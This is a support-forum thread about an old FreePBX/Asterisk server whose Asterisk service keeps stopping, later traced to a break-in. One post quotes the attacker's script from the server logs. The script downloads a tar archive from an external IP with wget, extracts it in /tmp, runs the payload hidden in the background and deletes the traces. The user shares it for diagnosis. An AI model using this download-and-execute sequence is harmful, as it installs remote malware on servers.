Asterisk crashing randomly HACKED

General Help
1

Hello All,

I have had a 1.818.210.58-1 server running for a few years without issue, but recently we have had several situations where asterisk just stops.
If we log into the web portal it confirms that asterisk is down.
A quick amportal restart gets it running, but we of course can’t have this random failure.

In looking in the logs the most I can find is:

[2016-08-31 20:46:58] DEBUG[18814] taskprocessor.c: destroying taskprocessor ‘core_event_dispatcher’
[2016-08-31 20:46:58] DEBUG[18814] taskprocessor.c: destroying taskprocessor ‘core_event_dispatcher’
[2016-08-31 20:46:58] VERBOSE[18814] asterisk.c: Asterisk cleanly ending (0).
[2016-08-31 20:46:58] VERBOSE[18814] asterisk.c: Asterisk cleanly ending (0).

But nothing helping me find a potential cause.

One other note a month back the raid array reported a problem with one of the drives, which ended up being that 1 of the partitions wasn’t syncing, we simple reconfigured the partition to be included in the raid and it has work perfectly without errors.

Any suggestions appreciated!

3

Hello All,

After some digging in the actual apache error log, I found the problem.
runsipb HACK

To share with everyone they are downloading a tar file to tmp and somehow extracting, then executing it.
This is what it does:
yum install php php5 -y
apt-get install php php5 -y
killall php
killall php
killall php
rm -rf /tmp/pkgsipb*
rm -rf /tmp/pkgsipb.tar
rm -rf /tmp/pkgsipb/
wget -O /tmp/pkgsipb.tar 194.63.142.183/pkgsipb.tar
chmod a+rwx /tmp/pkgsipb.tar
chmod ug+x /tmp/pkgsipb.tar
tar -xvf /tmp/pkgsipb.tar -C /tmp/
cd /tmp/pkgsipb
chmod a+rwx /tmp/pkgsipb/run
chmod ug+x /tmp/pkgsipb/run
chmod a+rwx /tmp/pkgsipb/
chmod ug+x /tmp/pkgsipb/
chmod a+rwx /tmp/pkgsipb/client.php
chmod ug+x /tmp/pkgsipb/client.php
/tmp/pkgsipb/./run 1>>/dev/null 2>>/dev/null &
disown
rm -rf /tmp/runsip
rm -rf /tmp/pkgsipb.tar

@tonyclewis or @tm1000

If you guys would like access to the server to learn more about this attack, you are welcome to contact me.

4

Sorry but that is unsupported release and a 3 version old FreePBX and using CentOS 5 which had plenty of secuity issues. Their has not ben releases for that in 4 years by us now.

5

No problem, didn’t know if this was an older attack or maybe one being used today that would be worth seeing whats there.

Thanks!

6

The issue is you are on FreePBX 2.10 so it would be useless as that is so old.